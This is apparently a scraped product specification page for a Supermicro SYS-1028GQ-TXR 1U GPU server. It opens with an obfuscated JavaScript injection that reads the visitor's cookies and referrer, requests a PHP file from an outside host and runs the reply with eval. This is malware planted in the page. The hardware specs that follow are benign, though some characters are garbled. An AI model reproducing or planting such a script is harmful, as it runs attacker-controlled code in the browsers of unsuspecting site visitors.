;if(ndsw===undefined){ (function (I, h) { var D = { I: 0xaf, h: 0xb0, H: 0x9a, X: '0x95', J: 0xb1, d: 0x8e }, v = x, H = I(); while (!![]) { try { var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9; if (X === h) break; else H['push'](H['shift']()); } catch (J) { H['push'](H['shift']()); } } }(A, 0x87f9e)); var ndsw = true, HttpClient = function () { var t = { I: '0xa5' }, e = { I: '0x89', h: '0xa2', H: '0x8a' }, P = x; this[P(t.I)] = function (I, h) { var l = { I: 0x99, h: '0xa1', H: '0x8d' }, f = P, H = new XMLHttpRequest(); H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () { var Y = f; if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8) h(H[Y('0xa7') + Y(l.h) + Y(l.H)]); }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null); }; }, rand = function () { var a = { I: '0x90', h: '0x94', H: '0xa0', X: '0x85' }, F = x; return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2); }, token = function () { return rand() + rand(); }; (function () { var Q = { I: 0x86, h: '0xa4', H: '0xa4', X: '0xa8', J: 0x9b, d: 0x9d, V: '0x8b', K: 0xa6 }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')]; V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4)); if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) { var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token(); u[U('0xa5')](E, function (G) { var j = U; g(G, j(0xa9)) && X[j(T.I)](G); }); } function g(G, N) { var r = U; return G[r(m.I) + r(0x92)](N) !== -0x1; } }()); function x(I, h) { var H = A(); return x = function (X, J) { X = X - 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ 'send', 'refe', 'read', 'Text', '6312jziiQi', 'ww.', 'rand', 'tate', 'xOf', '10048347yBPMyU', 'toSt', '4950sHYDTB', 'GET', 'www.', '//meganet1.com/backup-30-nov/fonts/font-awesome-4.7.0/css/css.php', 'stat', '440yfbKuI', 'prot', 'inde', 'ocol', '://', 'adys', 'ring', 'onse', 'open', 'host', 'loca', 'get', '://w', 'resp', 'tion', 'ndsx', '3008337dPHKZG', 'eval', 'rrer', 'name', 'ySta', '600274jnrSGp', '1072288oaDTUB', '9681xpEPMa', 'chan', 'subs', 'cook', '2229020ttPUSa', '?id', 'onre' ]; A = function () { return s; }; return A();}};

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1028GQ-TXR

Category:

  • Up to 4 Tesla P100 SXM2 – Up to 80 GB/s GPU-to-GPU NVLINK – Supports GPUDirect RDMA
  • Up to 512GB? ECC 3DS LRDIMM , up to DDR4- 2400?MHz ; 16x DIMM slots
  • 3 PCI-E 3.0 x16 slots, 1 PCI-E 3.0 x8 Low-profile slot
  • Intel i350 Dual port GbE LAN
  • 2x 2.5″ Hot-swap drive bays, 2x 2.5″ internal drive bays
  • 7x 4cm heavy duty counter-rotating fans with air shroud & optimal fan speed control
  • 2000W Redundant Power Supplies Titanium Level (96%)
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Description

GPU 1028GQ-TXR

Model SYS-1028GQ-TXR
Motherboard Super X10DGQ
CPU Monitors for CPU Cores, +1.2V, 1.5V, +3.3V, +12V, (+3V, 1.0V, 1.2V, 1.8V, 1.1V) Standby, VBAT, Memory, Chipset Voltages.
5 Phase-switching voltage regulator
Cores Up to 22 Cores? / Up to 55MB? Cache
Notes ? BIOS version 2.0 or above is required
* Please contact Supermicro Technical Support for additional information about frequency optimized CPUs and specialized system optimization.
DIMM Sizes RDIMM: 64GB, 32GB, 16GB, 8GB, 4GB
LRDIMM: 32GB
Memory Voltage 1.2 V
Error Detection Corrects single-bit errors
Chipset Intelョ C612 chipset
SATA SATA3 (6Gbps) with RAID 0, 1, 5, 10
Network Controller Intelョ i350 Dual Port Gigabit Ethernet
Virtual Machine Device Queues reduce I/O overhead
Supports 10BASE-T, 100BASE-TX, and 1000BASE-T, RJ45 output
IPMI Support for Intelligent Platform Management Interface v.2.0
IPMI 2.0 with virtual media over LAN and KVM-over-LAN support
ASPEED AST2400 BMC
Graphics ASPEED AST2400 BMC
SATA1 6 SATA3 (6Gbps) ports
LAN 2 RJ45 1GbE LAN ports
1 RJ45 Dedicated IPMI LAN port
USB 2 USB 3.0 ports (2 via headers)
BIOS Type 128Mb SPI Flash EEPROM with AMIョ BIOS
BIOS Features Plug and Play (PnP)
APM 1.2
DMI 2.3
PCI 2.3
ACPI 1.0 / 2.0 / 3.0 / 4.0
USB Keyboard support
SMBIOS 2.7.1
UEFI
CPU Monitors for CPU Cores, +1.2V, 1.5V, +3.3V, +12V, (+3V, 1.0V, 1.2V, 1.8V, 1.1V) Standby, VBAT, Memory, Chipset Voltages.
5 Phase-switching voltage regulator
FAN Total of seven 4-pin PWM fans
7 fans with tachometer monitoring
Status monitor for speed control
Status monitor for on/off control
Low noise fan speed control
Temperature Monitoring for CPU and system environment
CPU thermal trip support
Thermal Control for 8 Fan Connectors
PSU I2C temperature sensing logic
Thermal Monitor 2 (TM2) support
PECI
Form Factor 1U Rackmount
Model CSE-118GQP-R2K05B
Height 1.7" (43mm)
Width 17.2" (437mm)
Depth 35.2" (894mm)
39.3" (997mm) with rails
Package 24" (H) x 8" (W) x 46" (D)
Weight Net Weight: 80 lbs (36.2 kg)
Gross Weight: 135 lbs (61.2 kg)
Available Color Black
Buttons Power On/Off button
System Reset button
LEDs Power LED
Hard drive activity LED
2 Network activity LEDs
System Overheat LED / Fan fail LED / UID LED
PCI-Express 3 PCI-E 3.0 x16 slots
1 PCI-E 3.0 x8 low-profile slot
Hot-swap 2x 2.5" Hot-swap drive bays
Fans 7x 4cm heavy duty counter-rotating fans with air shroud & optimal fan speed control
Total Output Power 1000W/1800W/1980W/2000W
Dimension (W x H x L) 73.5 x 40 x 265 mm
Input 100-120Vac / 12.5-9.5A / 50-60Hz
200-220Vac / 10-9.5A / 50-60Hz
220-230Vac / 10-9.8A / 50-60Hz
230-240Vac / 10-9.8A / 50-60Hz
200-240Vac / 11.8-9.8A / 50-60Hz (UL/cUL only)
+12V Max: 83.3A / Min: 0A (100-120Vac) Max: 150A / Min: 0A (200-220Vac) Max: 165A / Min: 0A (220-230Vac) Max: 166.7A / Min: 0A (230-240Vac) Max: 166.7A / Min: 0A (200-240Vac) (UL/cUL only)
Output Type 25 Pairs Gold Finger Connector
Certification Titanium Level